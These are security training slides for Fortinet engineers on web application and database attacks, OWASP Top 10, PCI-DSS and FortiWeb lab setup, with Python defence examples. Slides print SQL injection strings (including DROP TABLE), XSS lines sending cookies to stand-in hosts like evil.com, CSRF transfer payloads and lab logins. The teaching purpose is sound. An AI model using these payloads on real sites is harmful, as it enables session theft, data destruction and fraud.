
LATAM SE TEAM FortiWeb and FortiDB Training

AGENDA

1. Introduction to Web Application Security
2. Database Vulnerabilities & Misconfigurations
3. OWASP Top 10 and PCI-DSS
4. Lab Installation and Setup
5. Introduction to FortiWeb
6. How to PoC FortiWeb
7. FortiWeb Basic & Advanced Troubleshooting
8. Introduction to FortiDB
9. How to PoC FortiDB
10. FortiDB Basic & Advanced Troubleshooting

Introduction to Web Applications

What are Web Applications?

[Figure: clients on the Internet reaching the web application]

- Web applications are public, Internet-facing applications
- Accessed using a standard browser; they provide webmail, online retail sales, online auctions, wikis and many other functions
- They are major e-commerce and business-driving tools for organizations

[Figure: Internet clients reach front-end web servers inside the data center perimeter; the web servers talk to database servers]

- Web apps are written for efficient delivery of content
- In most cases web apps are not developed with security in mind, which:
  - Leaves apps open to exploit
  - Exposes sensitive information
  - Invites attacks ranging from simple defacement to identity theft, credit card and other PII theft

Web Applications Advantages

- A standard web browser acts as the application client
- Creates a virtual hyperspace: beyond geographical constraints, breaks computer hardware and software obstacles, brings the whole world together
- A low-cost way to share, maintain and distribute information: intranet, electronic commerce, customer support

So, what are Client / Server Applications?

Client (front end):
- Presents an interface to the user
- Gathers information from the user, submits it to a server, then receives, formats and presents the results returned from the server
- The user needs specific software to access data on the server (and a specific operating system, etc.)
- The client connects to the server using specific ports

Server (back end):
- A database from which a client requests information
- Fulfills a request for information by managing the request or serving the requested information to the client
- Responsible for data storage and management
- Only allowed users can retrieve data from the server (firewall policies, access control, etc.)

Why are those differences important?

Adversaries have fewer obstacles when performing an attack. An infrastructure attack has to get past every obstacle in the infrastructure (listed as a figure on the original slide), while a web application attack presents fewer obstacles and elements: the application is reachable through the same browser traffic the perimeter already lets in.

Some Web Application Concepts

- HTTP is the networking protocol that is the foundation of the World Wide Web
- HTTP functions as a request/response protocol
- HTTP defines nine methods (GET, HEAD, POST, PUT, DELETE, OPTIONS, TRACE, CONNECT and PATCH); GET and POST are by far the most widely used

GET method: requests a representation of the specified resource. Data travels in the URL, where it also ends up in browser history and in proxy and server logs:

    GET /get.html?uid=xxx HTTP/1.1
    Host: www.xbank.com

POST method: submits data to be processed to the identified resource. Data travels in the message body:

    POST /login.php HTTP/1.1
    Host: www.xbank.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 29

    username=User1&password=pass1

Putting the credentials in the query string of a POST (POST /login.php?username=User1&password=pass1) defeats the purpose: the URL is logged exactly as it would be for a GET.

Some Web Application Concepts

HTML documents are usually static, but web applications need dynamic documents: search results, database access, context-sensitive replies.

Client side / server side execution:
- Server-side: the action occurs at the server; the server runs a set of instructions and returns values to the browser
- Client-side: the action occurs on the client (browser); the instructions are executed on the user's computer

Client Side Scripting

- Client-side scripts are embedded inside the HTML document and are interpreted by the browser
- When the web browser encounters a script, it calls a scripting interpreter, which parses and deciphers the scripting code
- Provides responses to questions and queries without intervention from the server: validate user data, calculate expressions, link to other applications

Client Side / Presentation Layer
- Goal: render and present content to the user
- Software: browsers (IE, Safari, Firefox, etc.)
- Language: HTML/JavaScript, etc.

Server Side Scripting
- Allows creation of dynamic web pages
- Modifies the HTML code on the server before it is sent to the client
- Uses databases such as Access and Oracle
- Responds to user input

Server Side / Application Layer
- Goal: receive user requests, validate and process them, and convert them into database requests
- Software: web servers (Apache/IIS), application servers (Tomcat, WebSphere)
- Language: Java/ASP/PHP

Database / Data Layer
- Goal: store and manage access to data
- Software: DBMS (Oracle, MS SQL Server, MySQL, etc.)
- Language: SQL

Common Web Application Problems

Input that requires validation:
- HTTP parameters
- HTTP headers
- Database/filesystem input
- Configuration

Output that requires encoding:
- HTML / CSS / JavaScript / XML / images

Web Application Security

Are your Web Applications Secure?

SQL Injections

Injection attacks trick an application into including unintended commands in the data sent to an interpreter. Interpreters are components that interpret strings as commands, e.g. SQL, LDAP, XPath.

Key idea: input data from the application is executed as code by the interpreter.

SQL Injections

[Figure: the attacker's form submission (password field: ' or 1=1--) passes the firewall to the web server and on to the DB server]

1. App sends form to user
2. Attacker submits form with SQL exploit data
3. Application builds string with exploit data
4. Application sends SQL query to DB
5. DB executes query, including exploit, and sends data back to the application
6. Application returns data to the user

SQL Injection Attack #1

Unauthorized access attempt:

    password = ' or 1=1 --

SQL statement becomes:

    select count(*) from users where username = 'user' and password = '' or 1=1 --'

Checks if password is empty OR 1=1, which is always true, permitting access. The -- turns the closing quote the application appends into a comment.

SQL Injection Attack #2

Database modification attack:

    password = foo'; delete from users where username like '%

DB executes two SQL statements:

    select count(*) from users where username = 'user' and password = 'foo'

    delete from users where username like '%'

Whether the second statement actually runs depends on the database and driver: some (MS SQL Server, for example) accept stacked statements in one call, others refuse them.

[Figure: "Exploits of a Mom" comic]

Cross Site Scripting

Cross Site Scripting (XSS) is a type of exploit where information from one context, where it is not trusted, can be inserted into another context, where it is trusted. The trusted website is used to store, transport or deliver malicious content to the victim. The target is to trick the client browser into executing malicious scripting commands: JavaScript, VBScript, ActiveX, HTML or Flash. It is caused by insufficient input validation and missing output encoding.

Cross Site Scripting can:
- Steal cookies: hijack the user's session, gain unauthorized access
- Modify the content of the web page: insert words or images, misinform, damage reputation
- Spy on what you do, map the network, spread as XSS viruses

Cross Site Scripting - Reflected

1. The attacker sends an e-mail with <script> tags embedded in the link:

    http://mybank.com/account.php?variable="><script>document.location="http://www.badguy.com/cgi-bin/cookie.cgi?"+document.cookie</script>

2. The victim follows the link and the script executes; www.badguy.com acts as the cookie collector.

The malicious content does not get stored on the server: the server bounces the original input back to the victim without modification.

Cross Site Scripting - Persistent

1. The attacker uploads malicious scripting commands to a public forum web site:

    Great message! <script> var img=new Image(); img.src="http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie; </script>

2. The victim browses the forum and downloads the malicious code.

The server stores the malicious content and serves it in its original form to every visitor.

Cross Site Request Forgery

Cross-site request forgery, also known as a one-click attack or session riding, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

[Figure: CSRF flow, the attacker's page triggering a request to the trusted site that the browser sends with the victim's session cookie]

Case Study: MySpace Samy Worm

- Samy Kamkar's JS worm from 2005
- Payload text: "but most of all, Samy is my hero"
- Exponential growth: 7 hours, ~200 infected; 12 hours, ~10K infected; 17 hours, >1M infected
- MySpace shuts down

Case Study: MySpace Samy Worm

- Encoded JavaScript inside a <div>
- Disguised the word "javascript" by inserting a newline into it
- Bypassed the innerHTML filter using eval('document.body.inne' + 'rHTML')

Case Study: MySpace Samy Worm

MySpace implemented a blacklist, and each rule was defeated by the next trick:
- Blacklist many tags, but not <a>, <div> and some others. So:
      <div style="background:url('javascript:alert(1)')">
- Blacklist the word javascript. So (newline inside the word):
      <div style="background:url('java
      script:alert(1)')">
- Blacklist innerHTML (document.body.innerHTML gives the page source). So:
      alert(eval('document.body.inne' + 'rHTML'))
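Why the escalating blacklist in the case study kept failing is easier to see in code. The block below is an added example, not MySpace's filter or anything from the training material: it reconstructs a three-version blacklist of the kind the slides describe, runs the three slide payloads through it, and then normalises the output the way the victim's browser and JavaScript engine would (newline dropped inside "java\nscript", adjacent string literals concatenated). The allowlist filter at the end is the alternative: keep only bare <b> and <i> tags and entity-encode everything else, so there is no list of bad words to extend.

```python
import re
from html import escape

# Reconstruction of the escalating blacklist the slides describe (not MySpace's
# real filter): version n removes every pattern in BLACKLIST[:n+1].
BLACKLIST = [r"<\s*script", r"javascript", r"innerHTML"]

# The three bypasses from the slides, one per blacklist version.
PAYLOADS = [
    "<div style=\"background:url('javascript:alert(1)')\">",   # no <script> tag needed
    "<div style=\"background:url('java\nscript:alert(1)')\">",  # newline inside the word
    "alert(eval('document.body.inne' + 'rHTML'))",              # forbidden word built at runtime
]


def blacklist_filter(version, html):
    """Strip every blacklisted pattern known to filter `version` (0, 1 or 2)."""
    for pat in BLACKLIST[: version + 1]:
        html = re.sub(pat, "", html, flags=re.IGNORECASE)
    return html


def as_seen_by_browser(s):
    """The normalisation the filter forgot: the browser of the day dropped the
    newline inside 'java\\nscript', and JS evaluates 'inne' + 'rHTML' to innerHTML."""
    s = re.sub(r"[\r\n\t]", "", s)
    s = re.sub(r"'\s*\+\s*'", "", s)
    return s


def still_dangerous(s):
    """Does anything executable survive once the browser has normalised it?"""
    return re.search(r"javascript:|innerHTML|<\s*script",
                     as_seen_by_browser(s), re.IGNORECASE) is not None


def bypasses(version, payload):
    """True if the payload gets through blacklist `version` in a form that still runs."""
    return still_dangerous(blacklist_filter(version, payload))


ALLOWED_TAG = re.compile(r"(</?(?:b|i)>)", re.IGNORECASE)


def allowlist_filter(html):
    """Positive model: keep only bare <b> and <i> tags, strip every other tag and
    entity-encode the remaining text. Nothing unexpected is passed through, so
    there is no blacklist to keep extending."""
    parts = ALLOWED_TAG.split(html)
    return "".join(p if ALLOWED_TAG.fullmatch(p)
                   else escape(re.sub(r"<[^>]*>", "", p), quote=True)
                   for p in parts)
```

Each payload defeats exactly the filter version it was written against (and every earlier one), while none of them survives the allowlist: the lesson of the case study is that a negative model has to anticipate every encoding the browser accepts, and a positive model does not.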

Some Reflections

64% of 10 million security incidents used port 80 as the entry point.

Database Vulnerabilities and Misconfigurations

What about the Database?

Database heists:

RSA: proprietary information about RSA's SecurID authentication tokens (2011).
"June 7, 2011 - RSA Faces Angry Users After Breach. The nation's biggest banks and large technology companies like SAP rushed Tuesday to accept RSA Security's offer to replace their ubiquitous SecurID tokens as many computer security experts voiced frustration with the company."

Sony PlayStation Network customers: more than 100 million customer account details and 12 million unencrypted credit card numbers (2011).
"Tue Apr 26, 2011 - Sony suffered a massive breach in its video game online network that led to the theft of names, addresses and possibly credit card data belonging to 77 million user accounts in what is one of the largest-ever Internet security break-ins."

HBGary Federal: 60,000 confidential emails, executive social media accounts, and customer information (2011).
"2011-03-01 - The embattled CEO of HBGary Federal has resigned his post three weeks after Anonymous hacked into the company's network and stole thousands of e-mail messages."

Epsilon: e-mail databases from 2 percent of the firm's 2,500 corporate clients (2011).
"April 02, 2011 - Major Breach at Epsilon, the World's Largest Permission Based Email Marketing Services Company, Affects Wide Range of Major Brands - List Continues to Grow"

Common DB Vulnerabilities / Misconfigurations

Default, blank and weak usernames/passwords
Removing default, blank and weak login credentials is an important first step for filling the chinks in your database armor. The bad guys keep track of default accounts, and they will use them when they can.

Excessive user and group privileges
Privileges should not be handed to individual users, who accumulate them the way janitors collect keys on their keychains. Make users members of groups or roles and administer rights through those roles, which can be managed collectively far more easily than rights assigned directly to users.

Unnecessarily enabled database features
Database installations come with add-on packages of all shapes and sizes that will mostly go unused by any one organization. Database security is about reducing attack surface: disable or uninstall the unused packages.

Broken configuration management
Databases offer DBAs many configuration choices for fine-tuning performance and enabling extra functionality. Unsafe configurations may be enabled by default or turned on for the convenience of DBAs or application developers.

Denial of service / buffer overflows
Buffer overflows are exploited by flooding input sources with far more characters than the application was expecting (like putting 100 characters into an input box asking for a SSN). Database vendors have worked hard to fix the bugs that allow these attacks, which is why patching is so critical.

Regulatory Environment

Vertical / Gov.   Regulation(s)           High-level requirements for databases
Cross industry    PCI, SOX                PID data access monitoring in databases; auditing financial database transactions to ensure the integrity of financial statements
Finance           GLBA, Basel II          Activity monitoring/audit of customer records and account information residing in databases
Healthcare        HIPAA                   Monitoring/auditing access to patient data residing in databases
Pharma.           CFR Part 11             Monitoring/auditing access to drug research data in databases
States            CA law 1386             Monitoring/auditing access to PID data residing in databases (privacy of personal information)
Federal           FISMA (NIST 800-53A)    Assessment and implementation of IT internal controls for databases

DB Activity and Monitoring Requirements

- Securing confidential data: Social Security numbers, credit card numbers and revenue figures are all held in databases and applications (ERP, CRM, SCM, custom applications)
- Automation of auditing and compliance: reporting for SOX, PCI and other regulations
- Change control: keep track of all changes related to database structures (DDL) and users (DCL)
- Virtualization: support both virtualized and non-virtualized environments
- Efficient deployment and management: low TCO

OWASP Top 10 - 2010

A1. Injection
A2. Cross site scripting (XSS)
A3. Broken authentication and session management
A4. Insecure direct object reference
A5. Cross site request forgery (CSRF)
A6. Security misconfiguration
A7. Insecure cryptographic storage
A8. Failure to restrict URL access
A9. Insufficient transport layer protection
A10. Unvalidated redirects and forwards

A1 - Injection

[Figure: injected input from the client passes through the application to whatever interpreter sits behind it: DB, shell, program, CPU]

    String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";

    id="foo"
    SELECT * FROM accnts WHERE ID='foo';

    id="foo';DROP TABLE accnts;--"
    SELECT * FROM accnts WHERE ID='foo';DROP TABLE accnts;--';
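The SQL Injection Attack #1 / #2 slides and the A1 snippet above all show one defect: the query text is assembled by string concatenation. The block below is an added example, not code from the training material or from the xbank application: it builds a small SQLite users table (constructed data), runs the slides' bypass payload against the concatenating login and against a parameterised one, and tries the stacked-statement payload to show that whether a second statement executes is a property of the driver, not of the application. Table and column names are chosen to match the slides.

```python
import sqlite3

# Constructed stand-in for the xbank users table (SQLite in memory); the slides'
# examples target a generic SQL database, the mechanism is identical.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("user", "secret"), ("hsimpson", "1234")])
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Builds the query by concatenation, exactly like the slides and the A1
    Java snippet: the user's input becomes part of the SQL text."""
    query = ("select count(*) from users where username = '" + username +
             "' and password = '" + password + "'")
    return conn.execute(query).fetchone()[0] > 0


def safe_login(conn, username, password):
    """Parameterised query: the values travel separately from the SQL text and
    are never parsed as SQL, whatever quotes or comments they contain."""
    query = "select count(*) from users where username = ? and password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def stacked_statement(conn, password):
    """Attack #2 / A1 shape: "foo'; delete ..." or "'; DROP TABLE ..." appended
    to the password. Whether the second statement runs is decided by the
    database driver, not by the application: Python's sqlite3 refuses more than
    one statement per execute(), while drivers for servers that accept batches
    (MS SQL Server, for example) execute both."""
    query = ("select count(*) from users where username = 'user' and password = '"
             + password + "'")
    try:
        conn.execute(query)
        return "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return "rejected by driver"


def count_users(conn):
    return conn.execute("select count(*) from users").fetchone()[0]
```

The bypass payload from Attack #1 logs in through vulnerable_login() with no valid password and is just an unmatched string in safe_login(); do not read the "rejected by driver" outcome as protection, since the same concatenation on a batch-capable server deletes or drops the table.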

A2 - Cross Site Scripting

[Figure: the attacker's input travels browser -> application -> DB and back out to the victim's browser]

    (String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";

    CC=123456789
    <input name='cc' value='123456789'>

    CC=123456789'><script>window.location='http://evil.com?x='+document.cookie</script>
    <input name='cc' value='123456789'><script>window.location='http://evil.com?x='+document.cookie</script>'>

A3 - Broken Authentication and Session Management

- Unpredictable passwords, session IDs and security questions
- No session IDs or credentials in URLs
- Avoid session fixation
- Session time-outs and logout buttons
- Different session IDs outside and inside TLS
- No clear-text passwords

A4 - Insecure Direct Object Reference

    <SELECT name=period>
      <OPTION>2010q1</OPTION>
      <OPTION>2011q2</OPTION>
    </SELECT>

The page offers period=2011q2; the attacker submits period=2011q3, a value the page never offered.

A5 - Cross Site Request Forgery

    <img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct" width="0" height="0" />

    <body onload="document.forms[0].submit()">
    <form method="POST" action="https://bank.com/fn">
      <input type="hidden" name="sp" value="8109"/>
    </form>
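Both CSRF vectors above (the hidden <img> GET and the auto-submitted POST form) rely on the browser attaching the victim's session cookie to a request the attacker's page initiated. The block below is an added example, not code from the training material or any real bank: it models a transfer endpoint with hypothetical names and applies the three server-side checks the attacker's page cannot satisfy, then replays the two attacks from the slide and a legitimate request against it. Also covers the A3 slide's point about unpredictable session IDs, which secrets.token_urlsafe() provides.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed model of the bank from the A5 slide (https://bank.com/fn with a
# transfer form). Hypothetical names; no real framework involved.
SITE_ORIGIN = ("https", "bank.com")
SESSIONS = {}          # session cookie value -> session record


def login(user):
    """Issue an unpredictable session id and a per-session CSRF token (A3)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """What the bank embeds in its own forms as a hidden field."""
    return SESSIONS[sid]["csrf"]


def handle_transfer(method, cookies, form, headers):
    """Returns (status, message). The browser attaches the session cookie to any
    request aimed at bank.com, including ones triggered from evil.com; that is
    the trust CSRF rides on. The three checks below are things an attacker's
    page cannot supply or fake."""
    sess = SESSIONS.get(cookies.get("session", ""))
    if sess is None:
        return 401, "no session"
    # 1. State-changing actions only via POST: kills the <img src=...> vector.
    if method != "POST":
        return 405, "transfers require POST"
    # 2. Origin (or Referer) must be our own site. Browsers set Origin on
    #    cross-site POSTs and page scripts cannot overwrite it.
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return 403, "missing Origin/Referer"
    p = urlparse(src)
    if (p.scheme, p.netloc) != SITE_ORIGIN:
        return 403, "cross-site request"
    # 3. Anti-CSRF token tied to the session, compared in constant time.
    if not hmac.compare_digest(form.get("csrf", ""), sess["csrf"]):
        return 403, "missing or wrong CSRF token"
    return 200, "transfer %s to %s for %s" % (
        form["amount"], form["destinationAccount"], sess["user"])


def legitimate_transfer(sid):
    """The bank's own form: POST, same origin, token present."""
    return handle_transfer("POST", {"session": sid},
                           {"amount": "1500", "destinationAccount": "savings",
                            "csrf": csrf_token_for(sid)},
                           {"Origin": "https://bank.com"})[0]


def forged_img_get(sid):
    """<img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct">"""
    return handle_transfer("GET", {"session": sid},
                           {"amount": "1500", "destinationAccount": "attackersAcct"},
                           {"Referer": "http://evil.com/page.html"})[0]


def forged_auto_post(sid):
    """<body onload="document.forms[0].submit()"> on the attacker's page: the
    cookie is attached, but Origin says evil.com and there is no token."""
    return handle_transfer("POST", {"session": sid},
                           {"amount": "1500", "destinationAccount": "attackersAcct"},
                           {"Origin": "http://evil.com"})[0]
```

Marking the session cookie SameSite=Lax or Strict (and Secure, as the A9 slide asks) adds a browser-side layer on top of these checks, but the token remains the control the server can verify on its own.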

A6 - Security Misconfiguration

- Patching: OS, application, frameworks/libraries
- Disable unnecessary services
- Stack traces
- Configuration

A7 - Insecure Cryptographic Storage

- Keep track of sensitive data
- Passwords one-way hashed and salted
- Password/key management: TLS key passphrases, machine-to-machine passwords (obfuscation)
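"One-way hashed and salted" in practice means a slow, salted key-derivation function and a constant-time comparison. The block below is an added example, not code from the training material: it stores a password as PBKDF2-HMAC-SHA256 with a fresh random salt per user in a self-describing record, verifies it, and contrasts that with the clear-text customer_password column in the lab's xbank schema. The iteration count is an assumption to be tuned to your hardware.

```python
import base64
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256 (assumed value; hundreds of thousands of
# iterations is the current order of magnitude, tune it to your servers).
ITERATIONS = 600_000


def hash_password(password, salt=None):
    """Returns a self-describing record: algorithm, iterations, salt and hash,
    so any of them can change later without breaking existing rows."""
    salt = salt or os.urandom(16)                       # fresh random salt per user
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS, base64.b64encode(salt).decode(), base64.b64encode(dk).decode())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant
    time so the comparison leaks nothing about how many bytes matched."""
    algo, iterations, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))


def plaintext_verify(password, stored):
    """What the xbank schema effectively does (customer_password holds '1234' in
    clear): one SQL injection or backup leak exposes every credential."""
    return password == stored
```

Because the salt is random, two users with the password 1234 get different records, so a leaked table cannot be attacked with one precomputed dictionary for all rows.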

A8 - Failure to Restrict URL Access

    /user/getAccounts
    /admin/getAccounts
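A4 (the period parameter above) and A8 (the /admin/ URL) are the two halves of server-side authorization: a request names an object it may not own, or a function it may not call. The block below is an added example, not code from the training material or the xbank application: it uses constructed users and accounts shaped like the xbank tables and shows a role check keyed on the URL prefix, an ownership check on the account id, and a check that a report period is one of the values the page actually offered. Hypothetical names throughout.

```python
# Constructed data shaped like the xbank tables (customer_id on each account).
USERS = {
    1: {"login": "hsimpson", "role": "customer"},
    2: {"login": "mburns", "role": "customer"},
    3: {"login": "branchadmin", "role": "admin"},
}
ACCOUNTS = {
    101: {"customer_id": 1, "account_balance": 500},
    102: {"customer_id": 2, "account_balance": 9000},
}
REPORT_PERIODS = ("2010q1", "2011q2")      # exactly what the <SELECT> offers

ROLE_FOR_PREFIX = {"/admin/": "admin", "/user/": "customer"}


def authorize(user_id, path):
    """A8: the URL is not a secret. Every request is checked against the
    caller's role on the server; hiding the /admin/ link does nothing.
    Unknown prefixes are denied by default."""
    user = USERS[user_id]
    for prefix, role in ROLE_FOR_PREFIX.items():
        if path.startswith(prefix):
            return user["role"] == role or user["role"] == "admin"
    return False


def get_account(user_id, path, account_id):
    """A4: the id in the request is an untrusted reference. Resolve it, then
    check that the object belongs to the caller (admins may see all)."""
    if not authorize(user_id, path):
        return 403, None
    acct = ACCOUNTS.get(account_id)
    user = USERS[user_id]
    if acct is None or (user["role"] != "admin" and acct["customer_id"] != user_id):
        # Same answer for "does not exist" and "not yours": no enumeration oracle.
        return 404, None
    return 200, acct


def get_report(user_id, path, period):
    """A4 for non-numeric references: period=2011q3 is not one of the values
    the page offered, so reject it instead of passing it on to the database."""
    if not authorize(user_id, path):
        return 403, None
    if period not in REPORT_PERIODS:
        return 400, None
    return 200, {"period": period, "for": USERS[user_id]["login"]}
```

The ownership check is what a WAF cannot do for you: it has no idea which customer_id owns account 102, so A4 has to be fixed in the application even when FortiWeb is in front of it.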

A9 - Insufficient Transport Layer Protection

- Use SSL/TLS
- No mixed content
- Use secure cookies

Example: Firesheep exploits poor solutions (session cookies sent over plain HTTP).

A10 - Unvalidated Redirects and Forwards

    http://www.vuln.com/redir.asp?=http://www.links.com
    http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D

The second line is www.google.com with every character percent-encoded: a destination filter that looks at the raw parameter never sees the hostname.
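The two naive checks below fail in exactly the ways the slide hints at. The block is an added example, not code from the training material: a prefix test lets a protocol-relative //evil.com through, a denylist on the raw parameter never sees the percent-encoded google.com, and the allowlisting validator decodes once, parses, and accepts only local paths or the site's own host. The allowed host list is an assumption for the example.

```python
from urllib.parse import unquote, urljoin, urlparse

SITE_HOSTS = {"www.vuln.com"}   # the application's own host(s); assumed for the example

ENCODED_GOOGLE = "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"   # second URL on the slide


def prefix_check(target):
    """Naive check 1: a string prefix test. Passes //evil.com, which browsers
    treat as a protocol-relative link to evil.com."""
    return target.startswith("http://www.vuln.com/") or target.startswith("/")


def denylist_check(target):
    """Naive check 2: look for known bad destinations in the raw parameter.
    Percent-encoding the host, as on the slide, walks straight past it."""
    return not any(bad in target.lower() for bad in ("google.com", "evil.com"))


def decoded_host(target):
    """What the browser will actually connect to."""
    return urlparse(unquote(target)).netloc


def safe_redirect_target(target, default="/"):
    """Decode once, parse, and allow only local paths or absolute URLs whose
    host is ours. Anything else falls back to a fixed default."""
    decoded = unquote(target)
    if "\\" in decoded:                      # /\evil.com is read as //evil.com by some browsers
        return default
    p = urlparse(decoded)
    if p.scheme and p.scheme not in ("http", "https"):
        return default                       # javascript:, data:, ...
    if p.netloc:                             # absolute or protocol-relative URL
        return decoded if p.netloc.lower() in SITE_HOSTS else default
    return urljoin("/", decoded)             # relative path on our own host
```

Note the userinfo trick http://www.vuln.com@evil.com/: the parsed netloc is www.vuln.com@evil.com, which is not in the allow list, so the validator rejects it without any special case.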

PCI-DSS Application Security Requirements

Web Application Security and PCI

Requirement 6: Develop and maintain secure systems and applications
- Patching
- Configuration
- Development lifecycle
- Testing
- Production

Sub-requirement 6.3
Develop software applications based on industry best practices and incorporate information security throughout the software development life cycle.
- 6.3.1 Testing of all security patches
- 6.3.2 Separate development, test, and production environments
- 6.3.3 Separation of duties between development, test, and production
- 6.3.4 Live PANs are not used for testing or development
- 6.3.5 Removal of test data and accounts before production
- 6.3.6 Removal of custom application accounts, usernames, and passwords
- 6.3.7 Review of custom code prior to release to production or customers

Sub-requirement 6.5
Develop all web applications based on secure coding guidelines such as the Open Web Application Security Project (OWASP) guidelines. Review custom application code to identify coding vulnerabilities.
- 6.5.1 Unvalidated input
- 6.5.2 Broken access control (for example, malicious use of user IDs)
- 6.5.3 Broken authentication and session management (use of account credentials and session cookies)
- 6.5.4 Cross-site scripting (XSS) attacks
- 6.5.5 Buffer overflows
- 6.5.6 Injection flaws (for example, structured query language (SQL) injection)
- 6.5.7 Improper error handling
- 6.5.8 Insecure storage
- 6.5.9 Denial of service
- 6.5.10 Insecure configuration management

Sub-requirement 6.6
Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
- Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security
- Installing an application layer firewall in front of web-facing applications

Sub-requirement 6.6 - Clarifications
- "Application firewall" means a Web Application Firewall (WAF), not a network firewall with application-layer inspection
- What makes a WAF acceptable for PCI?
  - Meets all applicable PCI DSS requirements
  - Reacts appropriately to threats
  - Inspects web application input and responds
  - Prevents data leakage
  - Enforces both positive and negative security models
  - Inspects Hypertext Markup Language (HTML), Dynamic HTML (DHTML) and Cascading Style Sheets (CSS)

Initial Lab Configuration

Lab Topology (VMnet1, host-only network 2.2.2.0/24)
- VM Database & FortiDB: 2.2.2.20/24, Windows XP, Administrator/fortidb1!$; FortiDB admin/fortidb1!$
- VM Web Server: 2.2.2.21/24, Ubuntu 10, xuser/xuser
- Host machine: 2.2.2.1/24
- FortiWeb: 2.2.2.15/24, FortiWeb-VM, admin/(blank password)

Preparing the VM Environment

From the USB sticks provided by Fortinet, copy the compressed VMs:
- FWB_VM64bit
- HTTP_Server
- DB_Server

And the FortiDB installer:
- FDB_X86

You will need:
- VMware Workstation 7/8/9
- RAM: 4096 MB
- Hard disk: 20 GB
- Hyper-Threading enabled

Customize VMware Environment

- Edit Network Interfaces: VMnet1 (host-only): 2.2.2.0/24
- Virtual machine connections: go to VM > Settings, edit Network Adapter (1) and point it to VMnet1
- Set the IP addresses as shown in the diagram for the Windows DB server, the Ubuntu HTTP server, FortiWeb and the host machine

FortiWeb Initial Configuration

Press the Enter key once to get a new prompt, and log in using the default FortiWeb-VM administrator name, admin. There is no password for the administrator, so press Enter when prompted. Use the CLI to configure the IP address of a virtual interface (port1):

    config system interface
        edit port1
            set ip 2.2.2.15/24
    end

Lab Flows

One-arm HTTP proxy topology: gives us enough flexibility for our labs.

- VM Database & FortiDB: 2.2.2.20/24, Windows XP, Administrator/fortidb1!$; FortiDB 4.2.1 admin/fortidb1!$
- VM Web Server: 2.2.2.21/24, Ubuntu 10, xuser/xuser
- Host machine: 2.2.2.1/24
- FortiWeb: 2.2.2.15/24, FortiWeb-VM build0414, admin/(blank password)

Flow 1: send traffic through the FortiWeb (host -> FortiWeb virtual IP -> web server).
Flow 2: send traffic straight to the web server (host -> 2.2.2.21).

This flat network deployment is not recommended in a production environment, since a client can easily bypass FortiWeb by addressing the web server directly.

Xbank Online Banking Application

- Web application: PHP/Apache
- Database: MS SQL Server
- Login URL: http://2.2.2.21/xbank/index.html
- Login: hsimpson, password: 1234

Xbank Navigation Flow

- index.html: redirects to index.php?p=login.html
- index.php: frameset
- topFrame.html: top frame
- bottomFrame.html: bottom frame
- login.html: login page
- verify_admin.php: authenticates the customer
- show_profile.php: shows customer information
- save_profile.php: saves changed customer information
- list_accounts.php: lists the customer's associated accounts
- list_activity.php: lists account activity
- list_cards.php: lists the customer's associated cards
- show_transaction.php: shows transfer information
- save_transaction.php: makes the transfer

Xbank Database Diagram

- XBANK_CUSTOMER: customer_id, customer_login, customer_password, customer_fname, customer_lname, customer_email, customer_address, customer_since
- XBANK_ACCOUNT: account_id, account_number, account_type, account_balance, account_currency, customer_id, branch_id
- XBANK_BRANCH: branch_id, branch_name, branch_address
- XBANK_CARD: card_id, card_number, card_type, card_cvd, card_expiration
- XBANK_ACCOUNT_CARD: account_id, card_id
- XBANK_ACTIVITY: activity_id, account_id, activity_timestamp, activity_type, activity_amount, activity_status

FortiWeb Servers Configuration

- Physical Server: the real HTTP server (real IP address)
- Virtual Server: represents the HTTP server as seen by external network devices (similar to a virtual IP)
- Protected Server: represents all IP addresses, hostnames or FQDNs that might appear in the Host header of the HTTP request

A note about Protected Servers

They matter in multi-homed scenarios where several sites share the same virtual IP and the same physical IP: protected hosts allow you to define different policies for different sites, selected by the Host header.

Be careful with NATed environments: when the application is accessed by IP address, the Host header carries the address the client used, which won't be the same as the virtual IP address configured on FortiWeb.

Physical Server Setup
1. Create a new Physical Server object
2. Unique object name
3. Physical IP address

Virtual Server Setup
1. Create a new Virtual Server object
2. Unique object name
3. Virtual IP address
4. Listening interface

Protected Servers Setup
1. Define Protected Servers
2. Unique object name
3. Default Action = Deny
4. Click OK to save
5. After saving, click Create New

Protected Servers Setup (2)
1. Hostname used by the client
2. Accept HTTP traffic with this hostname
3. Click OK to save

Protected Servers Setup (3): final results

Create a Web Policy
1. Select Server Policy
2. Click Create New to create a new Server Policy

Create a Web Policy (2)
Policies are the glue that join Physical Servers, Virtual Servers, Protected Hosts and Protection Profiles: what are we protecting, and how.
1. Complete your policy as defined in the left image
2. Leave other fields as default
3. Click OK to save

Checking the Configuration
